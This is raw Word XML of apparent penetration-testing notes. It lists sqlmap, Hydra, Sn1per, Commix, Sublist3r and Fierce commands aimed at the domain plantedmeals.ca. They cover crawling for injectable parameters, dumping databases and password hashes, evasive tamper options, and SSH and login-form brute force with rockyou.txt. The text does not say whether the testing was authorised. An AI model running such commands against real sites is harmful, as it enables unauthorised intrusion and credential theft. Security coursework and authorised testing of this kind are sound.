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E73739" w14:textId="54B2F9B4" w:rsidR="00E74CE9" w:rsidRDefault="00B87FCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A18276" w14:textId="274355EB" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F44C7">
        <w:t>Use a Random User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:t xml:space="preserve">--crawl=2 will automatically </w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scan the whole website</w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:t xml:space="preserve"> for URLs with parameters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF07C9" w14:textId="3A670688" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> -u "www.plantedmeals.ca" --crawl=2 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> --random-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B7934" w14:textId="539DDD6B" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:r w:rsidRPr="00B87FCF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4435C0" wp14:editId="554019CF">
            <wp:extent cx="5731510" cy="4571365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="2116031573" name="그림 1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31573" name="그림 1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7B54" w14:textId="77777777" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF"/>
    <w:p w14:paraId="0E98126F" w14:textId="77777777" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966DEC7" w14:textId="77777777" w:rsidR="003F44C7" w:rsidRDefault="003F44C7" w:rsidP="003F44C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Extract Password Hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>To get passwords (if stored in a table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDBE69" w14:textId="7F505F59" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF" w:rsidP="003F44C7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> -u "www.plantedmeals.ca" </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7D890" w14:textId="649C5295" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:r w:rsidRPr="00B87FCF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C191796" wp14:editId="5152C613">
            <wp:extent cx="5731510" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1456641129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41129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1A4D" w14:textId="77777777" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF"/>
    <w:p w14:paraId="07AA52A9" w14:textId="4FA362F8" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:r>
        <w:t>Aggressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="00442FF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD814F9" w14:textId="5851A7E8" w:rsidR="003F44C7" w:rsidRDefault="00442FF1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t xml:space="preserve"> -u "http://plantedmeals.ca/" --forms --crawl=3 --risk=3 --level=5 --tamper=space2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t>comment,charencode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t xml:space="preserve"> --random-agent --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C424535" w14:textId="0681A73D" w:rsidR="00986062" w:rsidRDefault="001B2E3F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="001B2E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F98A34" wp14:editId="163409D7">
            <wp:extent cx="5731510" cy="3989070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="507589761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89761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CBE2" w14:textId="1006D05F" w:rsidR="00986062" w:rsidRDefault="00A56B6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E901367" w14:textId="263EB250" w:rsidR="00A56B6B" w:rsidRDefault="00715C32">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t xml:space="preserve"> hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/common_roots.txt -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/share/wordlists/rockyou.txt -t 1 -w 5 www.plantedmeals.ca ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C7336" w14:textId="12C26127" w:rsidR="00715C32" w:rsidRDefault="00715C32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715C32">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4615CABE" wp14:editId="2AE941E3">
            <wp:extent cx="5731510" cy="1629410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1018783573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83573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BD6D" w14:textId="77777777" w:rsidR="00986062" w:rsidRDefault="00986062"/>
    <w:p w14:paraId="6A28BCA3" w14:textId="543F53C4" w:rsidR="009055AC" w:rsidRDefault="009055AC">
      <w:r w:rsidRPr="009055AC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7D57BA" wp14:editId="048CCA81">
            <wp:extent cx="5731510" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="925662138" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어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62138" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어, 폰트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78FF" w14:textId="77777777" w:rsidR="009055AC" w:rsidRDefault="009055AC"/>
    <w:p w14:paraId="540D95D8" w14:textId="0E2BAD93" w:rsidR="00416EBE" w:rsidRDefault="002B625B">
      <w:r w:rsidRPr="002B625B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CAEA4BD" wp14:editId="03C4A7E8">
            <wp:extent cx="5731510" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1206944825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44825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B990" w14:textId="77777777" w:rsidR="002B625B" w:rsidRDefault="002B625B"/>
    <w:p w14:paraId="73A4E7D9" w14:textId="61AAD259" w:rsidR="00852FF5" w:rsidRDefault="00852FF5">
      <w:r w:rsidRPr="00852FF5">
        <w:lastRenderedPageBreak/>
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>/share/wordlists/rockyou.txt portal.plantedmeals.ca https-post-form "/users/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>sign_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>in:email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>=^USER^&amp;password=^PASS^:F=Invalid email or password."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FC31A" w14:textId="52D294D7" w:rsidR="0069446A" w:rsidRDefault="00852FF5">
      <w:r w:rsidRPr="00852FF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111C72F3" wp14:editId="3AAE7BDD">
            <wp:extent cx="5731510" cy="3134995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1561164497" name="그림 1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64497" name="그림 1" descr="텍스트, 스크린샷이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할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C929" w14:textId="15874D04" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FD1D2C" w14:textId="77777777" w:rsidR="00395AD3" w:rsidRDefault="00395AD3">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A40F30" w14:textId="02A23CA4" w:rsidR="00852FF5" w:rsidRDefault="006A0FB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sn1per (automated reconnaissance and pen testing tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDFE93" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:r>
        <w:t>git clone https://github.com/1N3/Sn1per.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561C10D6" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:r>
        <w:t>cd Sn1per</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBECDDE" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC9D09" w14:textId="6BEC753E" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEBF0F" w14:textId="537B2E2D" w:rsidR="006A0FB9" w:rsidRDefault="00116B2C" w:rsidP="006A0FB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes about 20-30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F078E59" w14:textId="77777777" w:rsidR="00106AA2" w:rsidRDefault="009A511E" w:rsidP="006A0FB9"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sniper -t </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="004A335E">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>www.plantedmeals.ca</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m full </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB53901" w14:textId="5AD30E3C" w:rsidR="006A0FB9" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(perform full detailed reconnaissance scan</w:t>
      </w:r>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> port scan, web application scan, OSINT, exploit scan, passive reconnaissance, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, exploitation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693310B7" w14:textId="21FADF12" w:rsidR="009A511E" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="009A511E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304C7574" wp14:editId="0A67675A">
            <wp:extent cx="5731510" cy="4777105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="10443761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761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4EE7" w14:textId="3D971C44" w:rsidR="009A511E" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t gives me vast amounts of scanning results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D365C35" w14:textId="7C7B21BB" w:rsidR="009A511E" w:rsidRDefault="00F3510F" w:rsidP="006A0FB9">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">his tool uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F2F9B" w14:textId="2A0F19EC" w:rsidR="00106AA2" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ommix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5D6B2" w14:textId="5E112A7A" w:rsidR="0038021E" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>imilar to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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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better to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51251AED" w14:textId="342D16AD" w:rsidR="0038021E" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="0038021E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40CBCC54" wp14:editId="093FAD10">
            <wp:extent cx="5731510" cy="3759200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174850727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0727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694D" w14:textId="41C78FEE" w:rsidR="004C39D0" w:rsidRDefault="004C39D0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE978F3" w14:textId="6175CA4E" w:rsidR="004C39D0" w:rsidRDefault="004C39D0" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="004C39D0">
        <w:lastRenderedPageBreak/>
        <w:t>Sublist3r – Subdomain enumeration using public sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0AE7A" w14:textId="425C5815" w:rsidR="004C39D0" w:rsidRDefault="004C39D0" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="004C39D0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BABEA81" wp14:editId="3FA41485">
            <wp:extent cx="5731510" cy="3681730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1449121988" name="그림 1" descr="텍스트, 스크린샷, 폰트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21988" name="그림 1" descr="텍스트, 스크린샷, 폰트, 디자인이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할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BB43" w14:textId="4C0BCFF5" w:rsidR="004C39D0" w:rsidRDefault="004C39D0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2092A" w14:textId="3195C35E" w:rsidR="009123B3" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="001E6117">
        <w:lastRenderedPageBreak/>
        <w:t>Fierce (DNS Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool for mapping networks</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6117">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE66D67" w14:textId="7D13C0E7" w:rsidR="001E6117" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="001E6117">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DC5008" wp14:editId="24B94662">
            <wp:extent cx="5731510" cy="3482975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="670252434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52434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1935" w14:textId="473D257F" w:rsidR="001E6117" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ot proper to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A5BE7" w14:textId="666CFBAF" w:rsidR="009B78F3" w:rsidRDefault="009B78F3">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD7FFC" w14:textId="2F473F23" w:rsidR="009B78F3" w:rsidRPr="001E6117" w:rsidRDefault="009B78F3" w:rsidP="009B78F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009B78F3" w:rsidRPr="001E611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FCF"/>
    <w:rsid w:val="00106AA2"/>
    <w:rsid w:val="00116B2C"/>
    <w:rsid w:val="001B2E3F"/>
    <w:rsid w:val="001E6117"/>
    <w:rsid w:val="002B625B"/>
    <w:rsid w:val="0038021E"/>
    <w:rsid w:val="00395AD3"/>
    <w:rsid w:val="003F44C7"/>
    <w:rsid w:val="00416EBE"/>
    <w:rsid w:val="00442FF1"/>
    <w:rsid w:val="004910C6"/>
    <w:rsid w:val="004C39D0"/>
    <w:rsid w:val="006545B6"/>
    <w:rsid w:val="0069446A"/>
    <w:rsid w:val="006A0FB9"/>
    <w:rsid w:val="00715C32"/>
    <w:rsid w:val="00764EA7"/>
    <w:rsid w:val="00852FF5"/>
    <w:rsid w:val="009055AC"/>
    <w:rsid w:val="009123B3"/>
    <w:rsid w:val="00986062"/>
    <w:rsid w:val="009A511E"/>
    <w:rsid w:val="009B78F3"/>
    <w:rsid w:val="00A56B6B"/>
    <w:rsid w:val="00B87FCF"/>
    <w:rsid w:val="00DE19E2"/>
    <w:rsid w:val="00E74CE9"/>
    <w:rsid w:val="00F35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CFD2E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CBCB0B68-B64C-4A8D-90DC-CBDE87033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87FC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87F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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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B87FC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87FC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87FC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87FC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87FC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87FC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87FC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87F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87FC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87FC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87F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87FC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87FC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87FC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87F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87FC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87FCF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9A511E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9A51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14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www.plantedmeals.ca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9</Pages>
  <Words>225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Kim, Jackie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kim, Jackie</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-01T21:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-02T00:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>